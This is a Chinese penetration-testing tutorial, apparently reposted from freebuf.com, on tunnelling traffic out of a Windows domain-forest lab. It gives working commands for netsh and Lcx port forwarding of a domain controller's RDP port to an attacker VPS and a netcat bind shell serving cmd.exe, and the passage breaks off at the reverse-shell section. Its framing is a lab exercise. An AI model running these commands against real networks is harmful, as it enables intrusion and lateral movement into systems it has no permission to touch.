渗透测试之地基内网篇：域森林中多级域通信隧道（上） – 作者:dayuxiyou

系列文章

专辑：渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基，加强每日训练操作的笔记，在记录地基笔记中会有很多跳跃性思维的操作和方式方法，望大家能共同加油学到东西。

请注意：

本文仅用于技术讨论与研究，对于所有笔记中复现的这些终端或者服务器，都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，本站及作者概不负责。

名言：

你对这行的兴趣，决定你在这行的成就！

一、前言

渗透测试人员需谨记《网络安全法》，根据《网络安全法》所示，未经授权的渗透测试都是不合法的，不管是出于何种目的。红队渗透人员在进行渗透期间，渗透测试的行为和项目必须在被渗透方授予权限可渗透后，才可进行渗透测试操作。

如今有一家dayu公司，需要对自己的业务以及整体的内网框架体系进行隐患挖掘，授予权限我进行对dayu公司的渗透测试操作，在签署了双方的《渗透测试授权书》后，我开始了对dayu公司的渗透之旅。

跳开思维讲，我此篇内容是内网渗透篇章，通过我的专栏：

社工钓鱼 -> 免杀过全杀软 -> 内网渗透

那么我通过了社工钓鱼的各种方式，将钓鱼文件进行免杀后，成功钓鱼到了该公司外围人员计算机，并控制了该计算机权限获得shell，并成功登录对方电脑。

通过前期对域用户大量的信息收集，画出了相对应的简单网络拓扑图，下一步需要进攻子域控制器，思路如下：

域普通用户 -> 子域控制器 -> 父域控制器 ->辅域控制器

通过该思路进攻即可，还有另外一条思路：

域普通用户 -> 10.10.21.0/24二级区域 -> 继续延伸

渗透人员最爱系统之一有kali，还有各类windows集成的武器库系统，那么我需要把进行隐藏通信隧道技术，通过各种方法将内网的流量代理出来进一步的渗透。

不会隐藏通信隧道技术，就无法对内网多级网络进行进一步的渗透！！

二、环境介绍

目前信息收集获得的网络情况：（模拟环境）

拓扑图简介

为了更好的演示接下来的渗透和回看总拓扑图公司搭建环境情况：

单篇：渗透测试之地基内网篇：域森林大型环境搭建

通过拓扑图可知道，对方目前都是windows系统，那么接下来将演示windows环境下通信隧道技术！

三、netsh端口隧道

netsh 是 windows 系统自带的一个命令行工具，这个工具可以内置中端口转发功能。而且自带命令是过免杀的！！

那么将利用windows自带的端口转发netsh interface portproxy通过这个小工具在代理服务器设置端口转发！

1、普通域用户netsh

通过netsh进行端口转发：

netsh interface portproxy add v4tov4 listenport=7777 connectaddress=10.10.3.6 connectport=3389

netsh interface portproxy add v4tov4 listenport=绑定的端口 connectaddress=被攻击者服务器ip connectport=被攻击者服务端口

netsh interface portproxy show all
#查看转发规则

可看到windwos自带的netsh进行流量代理，将10.10.3.6子域控制器3389建立端口代理隧道！

2、测试隧道

可看到，通过netsh端口转发后，访问域用户名的外网IP+7777端口即可访问到内网的子域控制器的对应端口，进行渗透了~

3、拓展思路

如果二级域内或者二级内网环境，存在web等页面以及高危端口，可以通过端口转发进行内网渗透，如果web端口代理后，可以利用BurpSuite进行深入的渗透！

四、Lcx端口代理

首先复现最为经典的端口转发工具Lcx，Lcx是一个基于socket套接字实现的端口转发工具。

1、内网端口转发

1）域普通用户：（windows7）

Lcx.exe -slave VPS-IP 51 目标IP 3389 Lcx.exe -slave 192.168.253.11 51 10.10.3.6 3389

在目标机器上执行，将目标机器3389端口的所有数据转发到公网VPS（win7自建系统代替）的51端口上。

2）VPS机器：

Lcx.exe -listen 51  33891

最后用用mstsc登录公网IP:33891即可连接到目标机器的3389端口（记得在之间把防火墙策略打开或者关闭防火墙，信息收集讲过）

2、测试隧道

通过在VPS机子上进行访问，成功端口代理。

3、思路拓展

如果目标服务器由于防火墙的限制，无法传输3389的数据，可以查看防火墙开放了哪些端口数据允许传输，通过本地端口转发将3389转发到允许的端口上进行：

lcx -tran 53 目标主机IP地址 3389

通过转发到防火墙允许的端口上后，就可以进行端口转发代理出来进行渗透！

五、Netcat

Netcat简单理解就是从网络的一端读取数据，输出到网络的另一端，接下来介绍下端口转发和反弹shell！

1、正向shell

正向：客户端连接服务器，客户端向要获取服务器的Shell

1）域用户计算机执行：

nc64.exe -lvp 4445 -e c:\windows\system32\cmd.exe

2）VPS（攻击者）执行：

nc64.exe 192.168.253.35 4445

可看到攻击者计算机交互控制了域控制器！

2、反向shell

反向：客户端连接服务器，服务器想要获取客户端的Shell

反向Shell通常用在开启了防护措施的目标机器上，例如防火墙过滤端口转发等。

1）VPS（攻击者）上执行：

来源：freebuf.com 2021-03-09 15:35:47 by: dayuxiyou